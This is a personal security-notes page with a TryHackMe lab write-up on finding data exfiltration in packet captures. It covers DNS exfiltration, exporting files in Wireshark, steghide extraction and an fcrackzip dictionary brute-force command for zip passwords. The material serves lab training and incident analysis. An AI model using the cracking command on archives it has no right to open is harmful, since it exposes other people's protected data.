Cyber Security / Ethical Hacking
  • Prologue
  • CTF/OSCP Prep
    • Fundamentals
      • Linux
        • Basics
        • Bash Scripting
      • Windows
        • Basics
        • PowerShell
          • Scripting
        • CMD
      • Kali Survivor Skills
    • Information Gathering
      • Passive Recon
      • Active Recon
    • Enumeration
      • Common Ports
      • Vulnerability Analysis
    • Exploitation
      • Shells
  • Binary Exploitation / Exploit Development
    • Useful tools and techniques for Binary Exploitation
    • Shellcoders Handbook
      • Chapter 2 - Stack Overflows
        • Linux Buffer Overflow With Command Injection
        • Linux Buffer Overflow Without Shellcode
      • Chapter 3 - Shellcode
  • TryHackMe
    • Linux Fundamentals
      • Linux Challenges
      • RP: tmux
      • Common Linux Privesc
    • Advent of Cyber
      • Inventory Management
      • Arctic Forum
      • Evil Elf
      • Training
      • Ho-Ho-Hosint
      • Data Elf-iltration
      • Skilling Up
      • SUID Shenanigans
      • Requests
      • Metasploit-a-ho-ho-ho
      • Elf Applications
      • Elfcryption
      • Accumulate
      • Unknown Storage
    • Web Application Security
      • Web Fundamentals
      • Juice Shop
      • WebAppSec 101
    • Linux Privesc Playground
    • Intro to x86-64
    • Ninja Skills
    • CC: Radare2
    • Reversing ELF
    • Intro to Python
    • ToolsRus
  • Programming
    • Python
      • Simple TCP Port Scanner/ Banner Grabber
      • Botnet
      • Keylogger
      • Nmap Scanner
    • Golang
      • Execute Commands
      • MAC changer
      • TCP Port Scanner
      • TCP Port Scanner (improved with goroutines)
      • GoNmap Scanner
  • Protostar
    • Stack 0
    • Stack 1
    • Stack 2
  • Web App Pentesting
    • Recon
    • Authentication (Portswigger Academy)
      • Vulnerabilities in password-based login
        • Username Enumeration via different responses
        • Username enumeration via subtly different responses
        • Username enumeration via response timing
        • Broken brute-force protection, IP block
        • Username enumeration via account lock
        • Broken brute-force protection, multiple credentials per request
      • Vulnerabilities in multi-factor authentication
        • 2FA simple bypass
        • 2FA Broken Logic
        • 2FA bypass using a brute-force attack
      • Vulnerabilities in other authentication mechanisms
    • Broken Acess Controls
      • Insecure direct object references (IDOR)
        • Insecure direct object references lab
  • HackTheBox
    • Active
      • Untitled
      • Blunder
Powered by GitBook
On this page

Was this helpful?

  1. TryHackMe
  2. Advent of Cyber

Data Elf-iltration

Data Exfiltration Techniques

PreviousHo-Ho-HosintNextSkilling Up

Last updated 5 years ago

Was this helpful?

Companies have Data Loss Prevention systems to prevent data exfiltration. Data Exfiltration is the technique of transferring unauthorized data out of a network. Data Loss Prevention systems are not perfect, and they can allow data that is classified to leave the network. This is where the Security Operations Center (SOC) comes in.

Part of the job of a SOC Tier 1 Analyst is to determine if an attack had actually occurred, identifiable by many means. An easy way to do that is to review wireshark logs from the netowrk and search for data exfiltration techniques. Its easier to spot data that we know that shouldn't be leaving the network than to determine if an APT (Advance Persistent Threat) is inside. APTs can often be hidden deep inside the network, often abusing Kerberos and it's Ticket Granting System to gain permanent access.

Some Data Exfiltration techniques include:

  • DNS

  • FTP/SFTP based file transfer

  • SMB based file transfer

  • HTTP/HTTPS

  • Steganographical methods, like hiding data within images

  • ICMP

  • And many more

As long as a Data Exfiltration attempt is not occurring over an encrypted protocol, spotting it with wireshark can be incredibly simple. DNS is the single most common technique used in Data Exfiltration, mainly because it blends in with normal traffic. It is difficult to determine malicious DNS traffic since it is used on just about every single device in the network.

An attacker can have his website setup, listening for data on any subdomain other than www and record it to a file to later examine the contents.

Another technique is using photos to transfer data via methods of Steganography. The attacker may embed a hidden file within an image using a utility like Steghide [Note: Must be installed on Kali] (which we can also use to extract the data). If we noticed that a specific IP has requested a specific seemingly random image (like Google’s logo on a website that is not google), we may choose to investigate.

We can extract the contents of the file using wireshark by going to file -> export objects -> http -> google.jpg.

Then we can extract any potential contents of the file with Steghide with the command:

steghide extract -sf ./<file to extract>.jpg

As long as the file over HTTP, TFTP, FTP, or SMB, the data can be extracted from the packet capture. Some attackers may attempt to obfuscate the data further by placing the data in an encrypted zip file. Luckily for us, there are tools like fcrackzip (Note: fcrackzip is not preinstalled on Kali) that allow us to brute force zip files. The syntax is as follows:

fcrackzip -b --method 2 -D -p /usr/share/wordlists/rockyou.txt -v ./file.zip

-b specifies brute forcing, --method 2 specifies a Zip file, -D specifies a Dictionary, -p the path to the wordlist and -v verifies if the password is indeed correct.

Filtering the pcap for DNS packets, we can notice some data being exfiltrated.

This data seems to be hex encoded, and converting it to ASCII gives us the answer.

By extracting this data we have an image, a zip file and an text/html file.

Using fcrackzip we managed to find the password for the zip file.

We can notice the christmaslisttimmy.txt file which has the answer

Using steghide we can extract the hidden contents of the TryHackMe.jpg file and reveal the answer